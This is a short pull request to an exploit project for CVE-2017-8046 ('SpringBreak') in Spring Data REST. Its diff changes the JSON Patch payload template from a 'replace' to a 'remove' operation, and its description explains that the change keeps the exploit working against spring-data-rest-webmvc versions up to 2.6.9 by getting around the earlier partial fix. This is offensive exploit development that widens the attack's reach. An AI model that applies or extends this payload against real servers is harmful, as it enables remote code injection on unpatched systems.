### PR TITLE
Use patch-operation 'remove' instead of 'replace' for compatibility with spring-data-rest-webmvc 2.6.7 and 2.6.8

### DIFF
--- a/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
+++ b/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
@@ -54,7 +54,7 @@ public class SpringBreakCve20178046 {
     /**
      * The JSON Patch object.
      */
-    private static String JSON_PATCH_OBJECT = "[{ \"op\" : \"replace\", \"path\" : \"%s\", \"value\" : \"pwned\" }]";
+    private static String JSON_PATCH_OBJECT = "[{ \"op\" : \"remove\", \"path\" : \"%s\", \"value\" : \"pwned\" }]";
 
     /**
      * This is a way to bypass the split and 'replace'


### PR DESCRIPTION
By using operation 'remove' instead of 'replace', one can target spring-data-rest-webmvc up to version 2.6.9 instead of versions up to 2.6.7. At first, the SpEL-bug in the replace-operation was repaired. About two weeks later, in version 2.6.9, the other operations got repaired also. Check the spring commitlog for more details.